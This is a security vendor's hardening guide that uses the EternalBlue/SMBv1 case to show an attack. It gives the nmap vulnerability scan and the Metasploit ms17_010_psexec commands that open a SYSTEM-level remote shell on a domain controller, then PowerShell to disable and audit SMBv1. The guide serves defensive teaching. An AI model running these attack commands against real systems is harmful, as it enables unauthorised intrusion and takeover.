Cybersecurity in practice: System Hardening using the case study ‘SMBv1’ and ‘Eternal Blue Exploit’

SMBv1 is insecure – this has been known since 2014. Despite this, the Eternal Blue Exploit is still hitting some company networks. We show you how you can prevent attackers from using this ‘popular’ vulnerability as a gateway.

Why is SMBv1 so dangerous?

The Server Message Block Protocol version 1 (SMBv1 for short) is considered obsolete, but it is still running on many systems. Attackers therefore like to exploit this weakness. With the infamous Eternal Blue exploit, which targets the vulnerability Microsoft addressed in security bulletin MS17-010, attackers can gain unauthorised access to systems – which is exactly what the WannaCry and NotPetya cyberattacks achieved worldwide, among others.

In this guide, you will learn how an attacker exploits the SMBv1 vulnerability to penetrate systems. We also offer you a simple solution against the Eternal Blue Exploit.


This is how an Eternal Blue attack works

Let’s imagine the following scenario: An attacker has access to a corporate network, but no other rights. His goal is to open a remote shell with administrative rights on an unhardened domain controller (IP 10.10.99.10).

He uses Kali Linux (IP 10.10.99.7) for the attack. The operating system, which is intended for security experts, can also be ‘abused’ by black hat hackers.

The attack, in which the SMBv1 vulnerability is exploited from Kali Linux, is divided into these phases:

Phase 1: Analysis of the target system

The attacker starts with an analysis using the ‘nmap’ tool, which is used to scan networks and ports. The following command is sufficient for this:

nmap -v -Pn -sV 10.10.99.10

The result ‘reveals’ open ports – including port 445, which is used for SMB. The service ‘microsoft-ds’ reported for that port indicates that SMB is running, and the version detection (-sV) shows in which version.

The attacker now searches specifically for known vulnerabilities with the following input:

nmap -v -Pn -p 445 --script smb-vuln-ms17-010 10.10.99.10

The script reveals that the target system is vulnerable. This is a high risk factor.

Phase 2: Execution of the attack

In the next step, the attacker relies on Metasploit, a framework for penetration testers. He therefore enters the following commands in sequence:

msfconsole
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.10.99.10
set LHOST 10.10.99.7
run

A Meterpreter shell opens. The hacker can use this to control the system remotely. By entering ‘whoami’, he sees that he has the highest rights on the system (‘nt authority\system’).

In other words, the attacker receives a remote shell with administrative rights. This is the ideal starting point for penetrating further, stealing information, encrypting data or paralysing entire networks.

What is the solution? System Hardening!

In order to nip attacks like the one just described in the bud, ‘hardening’ is required. To do this, disable SMBv1 and use more secure alternatives such as SMBv2 or SMBv3. You can do this with this PowerShell command:

Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -Remove

A restart is then required to make the changes effective.
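As an added defender-side example (not part of the original article), the following PowerShell audits the current SMBv1 state, checks whether any connected clients still depend on SMBv1 before it is removed, and verifies the result after disabling it. It assumes an elevated PowerShell on Windows 8.1/10/11 or Windows Server 2016 and later, where the optional feature is named SMB1Protocol and Get-SmbServerConfiguration exposes AuditSmb1Access; on Windows Server 2012 R2 Microsoft documents Uninstall-WindowsFeature -Name FS-SMB1 instead.

```powershell
# Added example (not from the original article): audit, disable and verify SMBv1
# on the local Windows host. Assumes an elevated PowerShell on Windows 8.1/10/11 or
# Windows Server 2016+ where the optional feature is named SMB1Protocol.

function Get-Smb1Status {
    # Feature state in the component store (Enabled / Disabled / DisabledWithPayloadRemoved)
    $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
    # Runtime state of the SMB server service, independent of the feature package
    $server  = Get-SmbServerConfiguration
    [pscustomobject]@{
        FeatureState      = $feature.State
        Smb1ServerEnabled = $server.EnableSMB1Protocol
        Smb1Auditing      = $server.AuditSmb1Access
    }
}

function Get-Smb1Clients {
    # Dialect strings look like '2.1' or '3.1.1'; anything below 2.0 is an SMBv1 session.
    # Such legacy clients would break once SMBv1 is removed, so find them first.
    Get-SmbSession | Where-Object { [version]$_.Dialect -lt [version]'2.0' } |
        Select-Object ClientComputerName, ClientUserName, Dialect
}

function Disable-Smb1 {
    # Close the protocol at the server first, then remove the feature payload so it
    # cannot simply be switched back on. -NoRestart defers the reboot mentioned above.
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -Remove -NoRestart | Out-Null
}

# --- usage ---
$before = Get-Smb1Status
$before | Format-List
$legacy = Get-Smb1Clients
if ($legacy) {
    Write-Warning "Legacy SMBv1 clients are still connected; migrate them before removing SMBv1:"
    $legacy | Format-Table -AutoSize
    # Meanwhile log every SMBv1 access (event 3000, Microsoft-Windows-SMBServer/Audit) to find the rest
    Set-SmbServerConfiguration -AuditSmb1Access $true -Force
} else {
    Disable-Smb1
    $after = Get-Smb1Status
    if ($after.Smb1ServerEnabled -eq $false) {
        Write-Output "SMBv1 disabled (feature state: $($after.FeatureState)); reboot to finish removal."
    }
}
```

Running the script before and after the reboot shows the feature state moving to DisabledWithPayloadRemoved, which is the state the later nmap check in this article should be measured against.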

What are the benefits of System Hardening?

We run through the scenario again by proceeding in exactly the same way – but on a hardened system. This time, the results look like this:

✅ The scan no longer provides clear confirmation of the SMB service.

✅ The ‘nmap’ test for Eternal Blue vulnerabilities does not return any vulnerability.

✅ The attempt to execute the Metasploit exploit fails. No remote shell is opened.

Conclusion

The deactivation of SMBv1 successfully prevented the attack. The ‘cybergangster’ was no longer able to compromise the system, and MS17-010 or the Eternal Blue Exploit is therefore ineffective. This clearly shows how important it is to deactivate individual insecure services.

Bear in mind: the SMBv1 vulnerability is just one of many that should be eliminated preventively in IT systems. Every closed security gap reduces the attack surface – and therefore the risk of systems being compromised.

You therefore need to rely on a holistic security strategy in order to optimally protect your systems. This includes a comprehensive Secure Configuration or System Hardening. To make efficient progress, you should implement a professional hardening tool such as Enforce Administrator – especially if you have a large, heterogeneous IT landscape with hundreds or even thousands of systems.

How can we help you?

Would you like to know how you can professionally realise (automated) System Hardening and implement it in your company? Contact us – our experts will be happy to help you!
